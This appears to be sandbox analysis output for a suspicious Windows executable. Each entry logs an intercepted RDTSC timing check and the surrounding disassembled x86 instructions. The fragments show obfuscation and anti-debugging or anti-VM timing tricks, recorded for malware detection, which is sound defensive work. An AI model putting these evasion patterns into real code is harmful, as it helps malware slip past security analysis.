Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4BE888 second address: 4BE8D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FFAEC5291A8h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 push 00000000h 0x00000023 pushad 0x00000024 pushad 0x00000025 xor edx, dword ptr [ebp+122D3237h] 0x0000002b xor edx, dword ptr [ebp+122D31ADh] 0x00000031 popad 0x00000032 mov dx, di 0x00000035 popad 0x00000036 push 00000000h 0x00000038 mov edi, esi 0x0000003a push eax 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e jg 00007FFAEC5291A6h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4BE8D7 second address: 4BE8DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4BE8DB second address: 4BE8E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FFAEC5291ACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C077F second address: 4C0783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4BF99C second address: 4BFA4F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFAEC5291ACh 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007FFAEC5291ADh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007FFAEC5291A8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d mov edi, edx 0x0000002f push dword ptr fs:[00000000h] 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007FFAEC5291A8h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 mov dword ptr [ebp+122D1EC2h], esi 0x00000056 mov dword ptr fs:[00000000h], esp 0x0000005d or edi, dword ptr [ebp+122D293Dh] 0x00000063 mov eax, dword ptr [ebp+122D0955h] 0x00000069 jnc 00007FFAEC5291ABh 0x0000006f push FFFFFFFFh 0x00000071 mov dword ptr [ebp+122D189Dh], ebx 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a jne 00007FFAEC5291B3h 0x00000080 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C27A4 second address: 4C27B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAEC5267DAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C27B3 second address: 4C27B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C09B0 second address: 4C09B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C09B5 second address: 4C09BA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C2E3D second address: 4C2E43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C2E43 second address: 4C2E49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C2E49 second address: 4C2E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C3E85 second address: 4C3E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C3E89 second address: 4C3E97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FFAEC5267DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C3E97 second address: 4C3EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FFAEC5291A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C3EA7 second address: 4C3EAD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C3EAD second address: 4C3EB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C3EB3 second address: 4C3EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C5FF9 second address: 4C6002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C6002 second address: 4C600C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFAEC5267D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C75DC second address: 4C75E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C75E2 second address: 4C767C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5267E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FFAEC5267E2h 0x0000000f nop 0x00000010 call 00007FFAEC5267E8h 0x00000015 mov dword ptr [ebp+122D2942h], ecx 0x0000001b pop ebx 0x0000001c push 00000000h 0x0000001e jmp 00007FFAEC5267E6h 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push esi 0x00000028 call 00007FFAEC5267D8h 0x0000002d pop esi 0x0000002e mov dword ptr [esp+04h], esi 0x00000032 add dword ptr [esp+04h], 00000018h 0x0000003a inc esi 0x0000003b push esi 0x0000003c ret 0x0000003d pop esi 0x0000003e ret 0x0000003f xor dword ptr [ebp+122D1B75h], eax 0x00000045 push edx 0x00000046 movsx ebx, di 0x00000049 pop edi 0x0000004a push eax 0x0000004b push ebx 0x0000004c pushad 0x0000004d jno 00007FFAEC5267D6h 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C85F0 second address: 4C85F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C85F6 second address: 4C85FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C85FA second address: 4C861F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFAEC5291B8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C40F2 second address: 4C4103 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5267DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C861F second address: 4C8629 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFAEC5291A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C4103 second address: 4C4131 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5267E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFAEC5267E5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C4131 second address: 4C41C7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFAEC5291A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c push edi 0x0000000d mov dword ptr [ebp+122D28BAh], edx 0x00000013 pop edi 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov dword ptr [ebp+122D1C57h], edx 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007FFAEC5291A8h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 00000019h 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 mov eax, dword ptr [ebp+122D1395h] 0x00000048 push 00000000h 0x0000004a push edx 0x0000004b call 00007FFAEC5291A8h 0x00000050 pop edx 0x00000051 mov dword ptr [esp+04h], edx 0x00000055 add dword ptr [esp+04h], 00000018h 0x0000005d inc edx 0x0000005e push edx 0x0000005f ret 0x00000060 pop edx 0x00000061 ret 0x00000062 xor dword ptr [ebp+122D3372h], ecx 0x00000068 mov di, si 0x0000006b push FFFFFFFFh 0x0000006d movsx ebx, si 0x00000070 push eax 0x00000071 pushad 0x00000072 pushad 0x00000073 jne 00007FFAEC5291A6h 0x00000079 pushad 0x0000007a popad 0x0000007b popad 0x0000007c push eax 0x0000007d push edx 0x0000007e jmp 00007FFAEC5291ABh 0x00000083 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C3068 second address: 4C306D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C306D second address: 4C3085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d jmp 00007FFAEC5291AAh 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C96B3 second address: 4C96EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5267E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a ja 00007FFAEC5267D6h 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 jo 00007FFAEC526803h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FFAEC5267DEh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4CA79A second address: 4CA79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C87D0 second address: 4C884D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FFAEC5267D8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push dword ptr fs:[00000000h] 0x00000029 jc 00007FFAEC5267D6h 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 mov dword ptr [ebp+122D32A5h], ecx 0x0000003c mov eax, dword ptr [ebp+122D11FDh] 0x00000042 mov ebx, dword ptr [ebp+122D355Ah] 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push edx 0x0000004d call 00007FFAEC5267D8h 0x00000052 pop edx 0x00000053 mov dword ptr [esp+04h], edx 0x00000057 add dword ptr [esp+04h], 0000001Dh 0x0000005f inc edx 0x00000060 push edx 0x00000061 ret 0x00000062 pop edx 0x00000063 ret 0x00000064 push eax 0x00000065 pushad 0x00000066 pushad 0x00000067 pushad 0x00000068 popad 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4C884D second address: 4C8855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4CB688 second address: 4CB70C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FFAEC5267E6h 0x0000000b jmp 00007FFAEC5267E1h 0x00000010 popad 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FFAEC5267D8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f push 00000000h 0x00000031 sub bh, 0000004Eh 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007FFAEC5267D8h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 00000014h 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 push ecx 0x00000051 cld 0x00000052 pop edi 0x00000053 mov edi, esi 0x00000055 xchg eax, esi 0x00000056 pushad 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4CB8D7 second address: 4CB8DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4CB8DB second address: 4CB8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4CD942 second address: 4CD946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4CD946 second address: 4CD94C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4CD94C second address: 4CD970 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFAEC5291ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFAEC5291B1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4CD970 second address: 4CD975 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4D0847 second address: 4D0854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007FFAEC5291A6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4D0854 second address: 4D0869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFAEC5267DEh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4D0869 second address: 4D088D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291AAh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 jmp 00007FFAEC5291ACh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4D088D second address: 4D08A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FFAEC5267D6h 0x00000009 jmp 00007FFAEC5267E1h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4D4010 second address: 4D4017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4D4017 second address: 4D401C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4D401C second address: 4D4034 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAEC5291BAh 0x00000008 jmp 00007FFAEC5291AEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4D4034 second address: 4D403C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4D403C second address: 4D4052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAEC5291B2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4D4052 second address: 4D4071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FFAEC5267DFh 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4D3A62 second address: 4D3A85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291B6h 0x00000007 jbe 00007FFAEC5291A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4DAB42 second address: 4DAB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jne 00007FFAEC5267D6h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4DF2D4 second address: 4DF2E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAEC5291AFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4DF861 second address: 4DF865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4DFC51 second address: 4DFC57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4DFC57 second address: 4DFC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4DFC5F second address: 4DFC83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FFAEC5291B6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4E0071 second address: 4E0089 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5267E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4E021F second address: 4E0225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4E37CD second address: 4E37D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4EB62D second address: 4EB649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FFAEC5291B2h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4EB649 second address: 4EB658 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFAEC5267D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4EB958 second address: 4EB95C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4EB95C second address: 4EB962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4EB962 second address: 4EB96C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFAEC5291ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4EC109 second address: 4EC10F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4EC725 second address: 4EC729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4EC729 second address: 4EC732 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4EC732 second address: 4EC74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FFAEC5291A6h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFAEC5291ABh 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4EC74C second address: 4EC78F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FFAEC5267DCh 0x0000000d jno 00007FFAEC5267E5h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FFAEC5267E6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4F37BC second address: 4F37EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAEC5291B8h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFAEC5291B2h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4F3957 second address: 4F395D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4F3DC2 second address: 4F3DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4F3DC6 second address: 4F3DEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFAEC5267E9h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
